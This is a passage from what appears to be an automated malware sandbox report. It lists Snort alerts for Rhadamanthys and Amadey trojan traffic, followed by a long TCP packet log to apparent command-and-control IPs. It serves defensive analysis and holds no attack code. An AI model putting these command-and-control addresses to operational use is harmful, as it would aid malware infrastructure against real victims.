FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/14/24-08:45:10.367818	TCP	2854802	ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert	2036	49736	94.156.10.37	192.168.2.4
04/14/24-08:45:41.973536	TCP	2856147	ETPRO TROJAN Amadey CnC Activity M3	49740	80	192.168.2.4	91.202.233.180
04/14/24-08:45:42.049159	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49741	80	192.168.2.4	91.202.233.180
04/14/24-08:45:35.661847	TCP	2854802	ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert	2036	49739	94.156.10.37	192.168.2.4
04/14/24-08:45:58.278686	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49760	80	192.168.2.4	91.202.233.180
04/14/24-08:46:00.089663	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49763	80	192.168.2.4	91.202.233.180
04/14/24-08:45:25.958978	TCP	2854802	ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert	2036	49738	94.156.10.37	192.168.2.4
04/14/24-08:46:03.336126	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49767	80	192.168.2.4	91.202.233.180
04/14/24-08:45:52.931085	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49754	80	192.168.2.4	91.202.233.180
04/14/24-08:45:48.355188	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49748	80	192.168.2.4	91.202.233.180
04/14/24-08:45:55.955775	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49757	80	192.168.2.4	91.202.233.180
04/14/24-08:45:46.714449	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49747	80	192.168.2.4	91.202.233.180
04/14/24-08:45:43.758629	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49743	80	192.168.2.4	91.202.233.180
04/14/24-08:45:51.301565	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49752	80	192.168.2.4	91.202.233.180
04/14/24-08:46:05.015047	TCP	2044597	ET TROJAN Amadey Bot Activity (POST) M1	49769	80	192.168.2.4	91.202.233.180

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 14, 2024 08:45:09.904347897 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.130690098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.130835056 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.136183977 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.362198114 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.367818117 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.367863894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.368087053 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.388545990 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.621870041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.637620926 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.902244091 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902312994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902354956 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902390957 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902390957 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.902431011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902443886 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.902470112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902519941 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.902534962 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902573109 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902610064 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902626038 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:10.902647972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:10.902690887 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.128478050 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128602028 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128639936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128678083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128685951 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.128719091 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128760099 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128765106 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.128799915 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128823042 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.128838062 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128876925 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128896952 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.128914118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128956079 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.128977060 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.128993034 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.129029989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.129050016 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.129069090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.129106998 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.129129887 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.129148006 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.129184008 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.129198074 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.129224062 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.129264116 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.129286051 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.129302025 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.129349947 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.354981899 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355045080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355083942 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355122089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355129004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355165005 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355205059 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355206013 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355248928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355267048 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355308056 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355346918 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355370998 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355384111 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355422974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355443954 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355460882 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355499029 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355516911 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355537891 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355576038 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355595112 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355617046 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355654955 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355679989 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355691910 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355734110 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355772018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355772018 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355814934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355846882 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355859041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355896950 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355917931 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.355938911 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355978966 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.355997086 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.356019020 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356060982 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356081009 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.356098890 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356139898 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356158018 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.356180906 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356251955 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356261015 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.356291056 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356327057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356348038 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.356367111 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356403112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356431961 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.356441021 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356481075 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356512070 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.356518030 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356558084 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356574059 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.356595993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.356650114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.582686901 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.582793951 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.582833052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.582854986 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.582879066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.582899094 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.582921028 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.582940102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.582962036 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.582998991 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583038092 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583058119 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583077908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583116055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583117008 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583143950 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583158970 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583200932 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583220005 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583239079 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583277941 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583297014 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583318949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583355904 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583391905 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583391905 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583435059 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583456039 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583473921 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583512068 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583534956 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583549023 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583585978 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583606958 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583623886 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583659887 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583679914 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583698034 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583738089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583756924 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583776951 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583813906 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583834887 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583852053 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583888054 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583909988 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.583925009 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583961964 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.583978891 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584000111 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584037066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584055901 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584074020 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584111929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584136963 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584155083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584192038 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584213972 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584264994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584301949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584322929 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584338903 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584377050 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584397078 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584419012 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584455967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584474087 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584492922 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584532976 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584551096 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584569931 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584606886 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584629059 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584645033 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584681988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584706068 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584718943 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584757090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584773064 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584774017 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584793091 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584810972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584827900 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584827900 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584846020 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584863901 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584881067 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584881067 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584897995 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584914923 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584925890 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584934950 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584949970 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584953070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584970951 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.584985018 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.584988117 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585006952 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585025072 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585028887 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.585042953 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585061073 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585072994 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.585079908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585098982 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585098982 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.585115910 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585122108 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.585135937 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585151911 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585164070 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.585170031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585191011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585206985 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.585218906 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.585264921 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.811199903 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811311960 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811351061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811388016 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811400890 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.811429977 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811450005 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.811470985 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811508894 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811537027 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.811549902 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811589956 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811625004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.811630011 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811670065 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811698914 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.811709881 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811748028 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811774969 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.811784983 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811824083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811845064 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.811866045 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811903000 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811923981 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.811940908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.811980963 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812006950 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812017918 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812055111 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812076092 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812092066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812129021 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812155962 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812167883 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812205076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812242031 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812268019 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812311888 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812329054 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812350988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812391043 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812407017 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812432051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812472105 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812496901 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812509060 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812546968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812566042 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812592030 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812628984 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812648058 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812664986 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812705040 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812722921 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812741995 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812778950 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812802076 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812815905 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812853098 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812875032 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812894106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812931061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.812962055 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.812968016 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813005924 CEST	2036	49736	94.156.10.37	192.168.2.4
